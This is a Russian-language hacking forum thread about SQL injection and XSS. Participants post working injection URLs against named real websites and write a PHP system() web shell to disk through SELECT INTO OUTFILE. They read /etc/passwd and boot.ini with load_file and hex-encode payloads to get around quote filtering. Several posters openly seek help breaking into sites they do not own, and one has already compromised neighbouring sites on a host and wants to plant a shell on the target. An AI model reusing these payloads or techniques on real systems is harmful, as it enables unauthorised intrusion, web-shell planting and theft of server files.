postgres=# \d pg_shadow
View "pg_catalog.pg_shadow"
Column | Type | Modifiers
-------------+---------+-----------
usename | name |
usesysid | oid |
usecreatedb | boolean |
usesuper | boolean |
usecatupd | boolean |
passwd | text |
valuntil | abstime |
useconfig | text[] |
View definition:
SELECT pg_authid.rolname AS usename, pg_authid.oid AS usesysid, pg_authid.rolcreatedb AS usecreatedb, pg_authid.rolsuper AS usesuper, pg_authid.rolcatupdate AS usecatupd, pg_authid.rolpassword AS passwd, pg_authid.rolvaliduntil::abstime AS valuntil, pg_authid.rolconfig AS useconfig
FROM pg_authid
WHERE pg_authid.rolcanlogin;

А про права правильно сказано :) обычному юзеру их не хватит

Не раз просили поглядеть уязвимости на сайтах, реализованных только на хтмл. В основном инет-магазины.
есть какие статьи или "плезные советы" по поиску узявимостей на сайтах такого рода?
для примера: http://easy.md/

Calcutta, я думаю они поменяли только расширение с помощью .htaccess :)

ну а как опредилить пасивный xss от активного. То есть чем они отличаются я итак знал. Как определить какой надо использовать.

ну а как опредилить пасивный xss от активного. То есть чем они отличаются я итак знал. Как определить какой надо использовать.
Если код xss в странице - xss активная. Если же в запросе gpc - пассивная.

Так,может не сюда написал,но всё-таки. http://www.xakep.ru/magazine/xa/062/080/3.asp

При использовании материала из этой статьи не получилось создать кривого имени файла(используя UNS префиксы \\?\),но с папками работает третий способ - и работает на ура)).У кого-нибудь получалось создавать *не удаляемые* файлы ? Также в статье говорилось,что существуют программы,способные исправить сию *пошлость*. Хотелось бы знать - какие.

Да,и вот ещё вопрос - как обойти экранирование символов < > ? Возможно ли вообще)

http://127.0.0.1/phpnuke69/admin.php?op=login&pwd=123&aid=admin' INTO OUTFILE 'pwd.txt

После запроса данной строки в БД исполняется:

9 Query SELECT pwd, admlanguage FROM nuke_authors WHERE aid='admin' INTO OUTFILE 'pwd.txt'

Почему именно везде надо ставить одну кавычку ? почему не две?)

Ваще *** какая-то - Если не ставить кавычек,он итак обрамляет ( 'buke','user' и т.д.).Так зачем ещё кавычки ставить ?

Я использовал так :
select '<?system();?>' into outfile '/tmp/cache/tratatata.php'/*

Вот,я использовал 4 кавычки. Может я параноик... эти кавычки медленно,но верно убивают мой моск... спасите.


ЗЫ: Напоминаю ещё раз - это всего лишь пример (я имею ввиду интерпретацию функций и путей,так что не ругайте =_= ).

Велемир Кто тебе сказал что НАДА ставить кавычку ? просто еслы ты не вставиш ковычку запрос выйдет такой

9 Query SELECT pwd, admlanguage FROM nuke_authors WHERE aid='admin INTO OUTFILE pwd.txt'

тоесть выоплнется там ГДЕ aid = admin INTO OUTFILE pwd.txt ...
а нам надо просто ещё часть запроса добваить поэтому мы делаем так
ставим ковычку ' и полуается что мы указали что aid = admin но остаётся ещё одна проблема .... при таком раскладе выходит таой запрос

9 Query SELECT pwd, admlanguage FROM nuke_authors WHERE aid='admin INTO OUTFILE pwd.txt''

а поэтому нам не нужна ковычка в конце ... хотя моно добавить /* и всё остальное зашитается как коментарий =)

п.с вроде всё правильно :)

п.с.с это всё зависи от того как выглядит запрос в скрипте... иногда ваще надо вставлять не ' а "

Может стоит выучить элементарный синтаксис mysql а потом задавать вопросы?

Ладно-с...пасибо:Д.Вот не пойму,почему не грузится фаил лоад файлом(etc/passwd),имея права.Фильруются кавычки - двойные и одинарные. Как обычно,захексил всё нафиг(без кавычек разумеется(/etc/passwd).В итоге пустая страница,а такого не должно быть =_=.Пробывал и ../../../../../etc/passwd - результат один и тот же.Этот фаил доступен всегда,и права на чтения есть =_=.

Ладно-с...пасибо:Д.Вот не пойму,почему не грузится фаил лоад файлом(etc/passwd),имея права.Фильруются кавычки - двойные и одинарные. Как обычно,захексил всё нафиг(без кавычек разумеется(/etc/passwd).В итоге пустая страница,а такого не должно быть =_=.Пробывал и ../../../../../etc/passwd - результат один и тот же.Этот фаил доступен всегда,и права на чтения есть =_=.
а может файла такого нету !
может сервак на винде стоит .... :D

Или ты заблуждаешься думая что у mysql обязательно должны быть права на чтение этого файла;)

Велемир, у пользователя, из-под которого ты пытаешься открыть файл может не быть file_priv :)

А может там действительно винда =) Попробуй load_file('C:/boot.ini')

http://www.russianbeat.com/news.cfm?date=07%2F24%2F2008&offset=0&article=22'+union+select+1/*&topic=latest

Как раскрутить? Заранее thx.

Cennarios там не Mysql ошибка

Да, цэ ж mssql, а разве нельзя раскрутить mssql?

Посмотри на ошибку. Берётся целочисленное значение id, остальное не принимается. Такое не раскрутить скорей всего.

Да, цэ ж mssql, а разве нельзя раскрутить mssql?

The value "22' and 1=(select @@version)--" cannot be converted to a number

The error occurred in E:\RussianBeat\code\news.cfm: line 7

5 : <cfif #parameterexists(article)#>
6 : <cfif #len(article)# gt 0>
7 : id = #int(article)# and
8 : <cfset fullarticle=true>
9 : </cfif>

читай внимательнее про СУБД там вообще речи нет.
в скрипте ошибка при приведении типов (ака кастинг).

ясно, thx

Так скажет ктонить - как обойти эти долбаные < > в скл запросе ? С кавычками всё ясно - не прокатит,ибо гласит спецификация кавычки натуральными оставлять =_=.

mysql hex

Так скажет ктонить - как обойти эти долбаные < > в скл запросе ? С кавычками всё ясно - не прокатит,ибо гласит спецификация кавычки натуральными оставлять =_=.

<form action='<? $PHP_SELF; ?>' method=POST>
<input type=text name='hex'>
<input type=SUBMIT value="OK">
</form>
<?
error_reporting(0);
echo "$hex= ";
echo("0x".bin2hex("$hex"))
?>

Должно помочь.

USAkid
action='<? $PHP_SELF; ?>' можно опустить

echo "$hex= "; может echo "hex= "; ?

echo("0x".bin2hex("$hex")) без включенного register globals работать не будет

USAkid
echo "$hex= "; может echo "hex= "; ?


Не, я делал с рассчетом на то, чтобы кодируемая строка отображалась = сам hex

К примеру
/etc/passwd= 0x2f6574632f706173737764 :)

Не, я делал с рассчетом на то, чтобы кодируемая строка отображалась = сам hex

К примеру
/etc/passwd= 0x2f6574632f706173737764 :)
я об этом и написал.

Как можно провести запрос в БД MySQL если одинарная кавычка фильтруется? Пример запроса:
UPDATE namedb.pfx_table SET column = 'e10adc3949ba59abbe56e057f20f883e' WHERE pfx_tble.id =1 LIMIT 1

пробывал использовать char() не вышло :( Пример:
UPDATE namedb.pfx_table SET column = char(0x2765313061646333393439626135396162626535366 5303537663230663838336527) WHERE pfx_tble.id =1 LIMIT 1

UPDATE namedb.pfx_table SET column = 0x653130616463333934396261353961626265353665303537 6632306638383365
WHERE pfx_tble.id =1 LIMIT 1
или
UPDATE namedb.pfx_table SET column = char(0x65,0x31,...)
WHERE pfx_tble.id =1 LIMIT 1

одинарную кавычку не нужно хексить

Как можно провести запрос в БД MySQL если одинарная кавычка фильтруется? Пример запроса:
UPDATE namedb.pfx_table SET column = 'e10adc3949ba59abbe56e057f20f883e' WHERE pfx_tble.id =1 LIMIT 1

пробывал использовать char() не вышло Пример:
UPDATE namedb.pfx_table SET column = char(0x2765313061646333393439626135396162626535366 5303537663230663838336527) WHERE pfx_tble.id =1 LIMIT 1
Разобрался, оказывается я с чаром напутал :( запрос должен был выглядеть так:
UPDATE namedb.pfx_table SET column = char(92,39,101,49,48,97,100,99,51,57,52,57,98,97,5 3,57,97,98,98,101,53,54,101,48,53,55,102,50,48,102 ,56,56,51,101,92,39) WHERE pfx_tble.id =1 LIMIT 1

И как бы это печальным не показалось, но запрос провести не возможно через обычную SQL инъекцию :( и File_priv = No

День добрый!... Болею, дома валяюсь один.... И вот решил воплотить в жизнь одну мечту. сайтоломанием заняться. не в плохом понимании, конечно же. а именно те, которые есть за что ломать. вот адресс _http://www.youvebeenleftbehind.com Кое-что нашёл _http://www.youvebeenleftbehind.com/WebResource.axd?d=0' Если с этим что-то можно сделать, то как? Причина взлома- "кто зарегается на их сайте и даст 40 баксов, тот попадёт в рай, а стальные останутся на Земле под 7-ми летним правлением антихриста"... Короче деньги имеют с глупых граждан.
p.s.: Объясните мне, как ламеру. а то всё, что я в своей жизни видел из программирования, так это Delphi... причём уже 4 года не занимался этим.

http://www.isc.org.au/display_page.php?id=-1+union+select+table_name+from+INFORMATION_SCHEMA. TABLES+limit+20,1/*
http://www.guillembalague.com/interview_desp.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+INF ORMATION_SCHEMA.TABLES/*
my1476340166B@localhost

mysql hex


Разве это сработает с select into outfile ?)Там же хексить нельзя оО.

60% понял из того,что ты написал. А что ты собирался взломатьн а том сайте?))То,что ты написал - на sql никак не тянет))

Нельзя хексить путь файла в который сохраняешь. Хексить же записываемые данные можно. Без кавычек ес-но

Всё прошло успешно,кроме одного - нет прав на запись/чтение файлов в каталоге ( Can't create/write to file '/etc/gaga.php' (Errcode: 13 ) ).Означает ли это,что мне никуда нельзя осуществлять запись,кроме папки /tmp ? И если нет, то как найти папку,в которую можно осуществлять запись ?

Через скуль - только методом тыка.

Через скуль - только методом тыка.

Ты хошь сказать,что мне придётся все папки на сервере проверить?))))Там их миллион наверн)))))))))))))))))).Прикинь какой будет прикол,если у меня права ноубади:РР.Может есть способ попроще ?))

Вечер добрый!... Уже писал, но никто не откликнулся. Болею, дома валяюсь один.... И вот решил воплотить в жизнь одну мечту. сайтоломанием заняться. не в плохом понимании, конечно же. а именно те, которые есть за что ломать. вот адресс _http://www.youvebeenleftbehind.com Кое-что нашёл _http://www.youvebeenleftbehind.com/WebResource.axd?d=0' Если с этим что-то можно сделать, то как? Причина взлома- "кто зарегается на их сайте и даст 40 баксов, тот попадёт в рай, а стальные останутся на Земле под 7-ми летним правлением антихриста"... Короче деньги имеют с глупых граждан.
p.s.: Объясните мне, как ламеру. а то всё, что я в своей жизни видел из программирования, так это Delphi... причём уже 4 года не занимался этим.

Эх. Жаль... Да я и сам ничего не смог найти. Странный сайт какой-то.

http://www.mutu.ro/ro_guestbook.php?st=
ковычку подставил..но вот раскрутить не получается...2 других сайта с этого хоста уже..но не получается шелл залить ни как, цель этот сайт... прошу предложения в студию.
Заранее спасибо.

http://www.mutu.ro/ro_guestbook.php?st=
ковычку подставил..но вот раскрутить не получается...2 других сайта с этого хоста уже..но не получается шелл залить ни как, цель этот сайт... прошу предложения в студию.
Заранее спасибо.

Пост запросы юзал?)

2 Велемир поподробнее

Ну я про то,что когда перехожу по этой ссыле - не вижу get параметров в браузере =_=.Вот и подумал,что это пост.Как ты скулю то нашёл?).Или это меня редиректит так оО...

тебя редиректит.... скуля там.. да вроде единственная возможность на этом сайте подставить ковычку